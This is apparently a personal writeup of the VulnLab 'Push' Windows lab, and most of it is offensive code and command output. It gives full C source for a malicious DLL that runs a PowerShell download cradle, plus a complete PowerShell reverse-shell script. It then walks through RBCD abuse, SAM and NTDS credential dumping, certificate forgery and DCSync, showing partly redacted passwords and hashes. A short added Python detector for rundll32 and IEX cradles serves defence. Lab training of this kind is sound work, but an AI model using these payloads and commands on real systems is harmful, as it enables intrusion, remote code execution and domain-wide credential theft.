vulnlab-push
a hard Windows machine
preparation
create puck.c on kali box
puck.c contains:
#include <windows.h>

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:
        system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}
create malicious dll
puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
puckshell.txt contains:
function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR
$address = '192.168.1.136'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\windows\system32\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read;
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}
    }
    if ($pos -gt 0) {
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read());
                if ($out -eq $string) {$out = ''}
            }
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null
        }
    } else {cleanup}
}
on attacker pc run http listener and nc listener
c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie
test on windows target with
rundll32.exe C:\Payloads\puck.dll,XYZ
If all tests are successful, we continue to the writeup.
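On the defensive side, the chain tested above leaves a distinctive process tree: rundll32.exe loading a DLL from a user-writable path, a cmd.exe spawned by DllMain's system() call, and a PowerShell IEX download cradle underneath it. The following detection helper is an added example, not code from the writeup; the event field names and the sample events are constructed for illustration.

```python
"""Added detection helper: flag rundll32 loading a DLL from outside the usual system
directories and a PowerShell IEX download cradle descending from it, over constructed
process-creation events (field names pid/ppid/image/cmdline are this example's own)."""
import re

# Directories rundll32 normally loads DLLs from; anything else is worth a look.
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files")
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^\s",]+)\s*,\s*(\S+)', re.I)
CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b.*(downloaddata|downloadstring|webclient)", re.I)

def rundll32_untrusted_dll(cmdline):
    """Return (dll_path, export) when rundll32 loads a DLL from an untrusted path, else None."""
    m = RUNDLL_RE.search(cmdline)
    if not m:
        return None
    dll = m.group(1).lower()
    return None if dll.startswith(TRUSTED_DLL_DIRS) else (dll, m.group(2))

def has_ancestor(by_pid, event, image_substr, depth=4):
    """Walk parent links: system() in DllMain puts a cmd.exe between rundll32 and powershell."""
    cur = event
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return False
        if image_substr in cur["image"].lower():
            return True
    return False

def score_events(events):
    """Return (alert_tag, pid) tuples for suspicious events, in input order."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if rundll32_untrusted_dll(e["cmdline"]):
            alerts.append(("rundll32-untrusted-dll", e["pid"]))
        if "powershell" in e["image"].lower() and CRADLE_RE.search(e["cmdline"]):
            tag = "cradle-from-rundll32" if has_ancestor(by_pid, e, "rundll32") else "download-cradle"
            alerts.append((tag, e["pid"]))
    return alerts

# Constructed sample events mirroring this writeup's test run (not real telemetry).
CRADLE = ("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient)"
          ".DownloadData('http://192.168.36.116:9000/puckshell.txt')))")
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Payloads\\puck.dll,XYZ"},
    {"pid": 250, "ppid": 200, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c " + CRADLE},
    {"pid": 300, "ppid": 250, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": CRADLE},
    {"pid": 400, "ppid": 100, "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
]
```

Running score_events(SAMPLE_EVENTS) flags the rundll32 process (200) and the cradle (300) while the legitimate shell32.dll call (400) stays quiet.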
Writeup:
To abuse ClickOnce we follow the article: we need to upload our SelfService.dll.deploy, which will download and execute a reverse shell.
More to come …
With a shell as kelly.hill we find her credentials in her home folder:
evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!'
xfreerdp /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx
Bloodhound Analysis:
bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp
Check machine account quota
crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq
RBCD abuse
From BloodHound we see that kelly.hill has First Degree Object Control over MS01: AllExtendedRights and WriteAccountRestrictions. This means we can read all properties of MS01 and, through WriteAccountRestrictions, edit msDS-AllowedToActOnBehalfOfOtherIdentity to perform RBCD (resource-based constrained delegation).
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account puckie$ with password Summer2024!.

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     puckie$   (S-1-5-21-1451457175-172047642-1427519037-3603)

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)
Now that we have the Administrator hash of MS01, we log in with evil-winrm and query the SCCM site info with SharpSCCM:

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir

    Directory: C:\Users\kelly.hill\documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          7/25/2024   7:39 AM        1125376 SharpSCCM.exe

*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

(SharpSCCM banner, @_Mayyhem)

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents>
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps

SCCMHunter v1.0.5 by @garrfoster

[10:15:22] INFO [*] Checking for System Management Container.
[10:15:22] INFO [+] Found System Management Container. Parsing DACL.
[10:15:22] INFO [-] System Management Container not found.
[10:15:22] INFO [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'
[10:15:23] INFO [-] No results found.

┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps

SCCMHunter v1.0.5 by @garrfoster

[10:17:30] INFO [-] No SiteServers found in database.
[10:17:30] INFO [-] No Management Points found in database.
[10:17:30] INFO [-] No computers found in database.
I could not solve the sccadmin exploit.
It should run like below, giving the hash in Responder:

PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0

(SharpSCCM banner, @_Mayyhem)

[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.2.138
      NetBIOS name: 10.8.2.138
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:7D070746-617E-4763-9835-F7811A6BED54

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974
As we now have the password of user sccadmin, we verify it with crackmapexec and move on to a golden certificate attack.

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB         DC01.push.vl    445    DC01             [+] push.vl\sccadmin:7u<redacted>JM

A golden certificate attack with certipy-ad and passthecert is possible because we have SYSTEM access to MS01 (which is the CA): with the CA's own certificate and private key we can forge a certificate for any user.
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and to 'administrator.crt'

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Granted user 'kelly.hill' DCSYNC rights!

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::
That was fun 🙂
references used
– sccm